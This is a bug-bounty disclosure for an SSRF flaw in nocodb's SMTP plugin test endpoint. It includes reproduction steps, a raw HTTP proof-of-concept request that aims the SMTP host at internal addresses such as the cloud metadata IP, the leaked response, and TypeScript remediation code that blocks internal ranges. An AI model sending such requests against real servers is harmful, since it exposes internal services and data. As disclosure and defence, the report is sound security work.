SSRF via Plugin SMTP in nocodb/nocodb

Valid

Reported on

Jun 9th 2022


Description

The SMTP plugin's test endpoint does not verify or validate the host and port supplied by the user, so an attacker can make the server connect to internal hosts and read what they return.

Reproduce

  1. Go to Team & Settings
  2. App Store > SMTP
  3. Configure and intercept Test request
  4. Change Host/Port to an internal address, for example 169.254.169.254, 192.168.0.1 or 127.0.0.1
  5. The response contains the content returned by the internal service.

Proof of Concept

POST /api/v1/db/meta/plugins/test HTTP/1.1
Host: 192.168.15.50:8080
Content-Length: 129
Accept: application/json, text/plain, */*
xc-gui: true
xc-auth: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Content-Type: application/json
Origin: http://192.168.15.50:8080
Referer: http://192.168.15.50:8080/dashboard/
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: refresh_token=
Connection: close

{"input":{"from":"","host":"192.168.15.41","port":"1337","secure":""},"id":"nc_rb4gaggzddwut5","category":"Email","title":"SMTP"}

Response

{"msg":"Invalid greeting. response=[INTERAL] - SUPERADMIN MANAGMENT SYSTEM PRIVATE: [INTERAL] - SUPERADMIN MANAGMENT SYSTEM PRIVATE"}

Video Demo

https://drive.google.com/file/d/1hCJ8nXpssBRq7sV8JN73oXupN_zPWN-T/view?usp=sharing

Remediation

  • Validate and filter the data received from the user.
  • Use an allow-list containing only the IPs the application needs.
  • Do not return the content of the connection to the user.
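The three remediation points above, as an added defender-side example in TypeScript (not nocodb's own code): a deny-list of internal ranges, an optional allow-list of relays, one DNS resolution whose result is vetted before connecting, and a fixed error message in place of the echoed banner. All names (DENIED_CIDRS, ALLOWED_SMTP_HOSTS, checkSmtpTarget, resolveSmtpTarget, userFacingTestError) are hypothetical.

```typescript
import { BlockList, isIP } from "net";
import { promises as dns } from "dns";
// Hypothetical names throughout; this is an added example, not nocodb's code.
// Ranges the server must never contact for a user: loopback, RFC 1918, link-local
// (which covers the 169.254.169.254 metadata endpoint) and the IPv6 equivalents.
const DENIED_CIDRS = ["127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
  "169.254.0.0/16", "0.0.0.0/8", "::1/128", "fc00::/7", "fe80::/10"];
const denied = new BlockList();
for (const cidr of DENIED_CIDRS) {
  const [net, bits] = cidr.split("/");
  denied.addSubnet(net, Number(bits), isIP(net) === 6 ? "ipv6" : "ipv4");
}
// Allow-list of the relays this deployment needs (empty = not enforced).
export const ALLOWED_SMTP_HOSTS = new Set<string>();
const SMTP_PORTS = new Set([25, 465, 587]);

export function isDeniedAddress(addr: string): boolean {
  const mapped = /^::ffff:(\d+\.\d+\.\d+\.\d+)$/i.exec(addr); // ::ffff:127.0.0.1 form
  if (mapped) return isDeniedAddress(mapped[1]);
  const family = isIP(addr);
  if (family === 0) return true; // not an address literal: never hand it to the connector
  return denied.check(addr, family === 4 ? "ipv4" : "ipv6");
}

// Policy for the user-supplied host/port plus the addresses the host resolved to.
// Returns null when acceptable, otherwise a reason that is safe to show the user.
export function checkSmtpTarget(host: string, port: string | number, addrs: string[]): string | null {
  const h = host.trim().toLowerCase().replace(/^\[|\]$/g, ""); // strip [v6] brackets
  const p = Number(port);
  if (!Number.isInteger(p) || !SMTP_PORTS.has(p)) return "port not permitted";
  if (ALLOWED_SMTP_HOSTS.size > 0 && !ALLOWED_SMTP_HOSTS.has(h)) return "host not on the SMTP allow-list";
  if (addrs.length === 0 || addrs.some(isDeniedAddress)) return "host not permitted";
  return null;
}

// Resolve once, vet every address, and return the vetted addresses: the SMTP client
// must connect to one of these rather than re-resolve the name (DNS rebinding).
export async function resolveSmtpTarget(host: string, port: string | number): Promise<string[]> {
  const h = host.trim().replace(/^\[|\]$/g, "");
  const addrs = isIP(h) ? [h] : (await dns.lookup(h, { all: true })).map((r) => r.address);
  const reason = checkSmtpTarget(host, port, addrs);
  if (reason) throw new Error(reason);
  return addrs;
}

// The vulnerable response echoed the remote banner. Return a fixed message and keep
// the detail in server logs, so the endpoint cannot be used to read internal services.
export function userFacingTestError(_err: unknown): string {
  return "SMTP test failed; see server logs for details";
}
```

Pass the addresses returned by resolveSmtpTarget to the SMTP client and log the real error server-side; the user only ever sees the fixed message.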

Impact

SSRF to internal addresses: an attacker can make requests as the server and read their contents, which can lead to leakage of sensitive information.

Timeline

  • We are processing your report and will contact the nocodb team within 24 hours. (17 days ago)
  • We have contacted a member of the nocodb team and are waiting to hear back. (16 days ago)
  • We have sent a follow up to the nocodb team. We will try again in 7 days. (13 days ago)
  • navi validated this vulnerability. (13 days ago)
  • Jonatas has been awarded the disclosure bounty.
  • The fix bounty is now up for grabs.
  • The researcher's credibility has increased: +7
  • navi confirmed that a fix has been merged on a18f5d. (13 days ago)
  • navi has been awarded the fix bounty.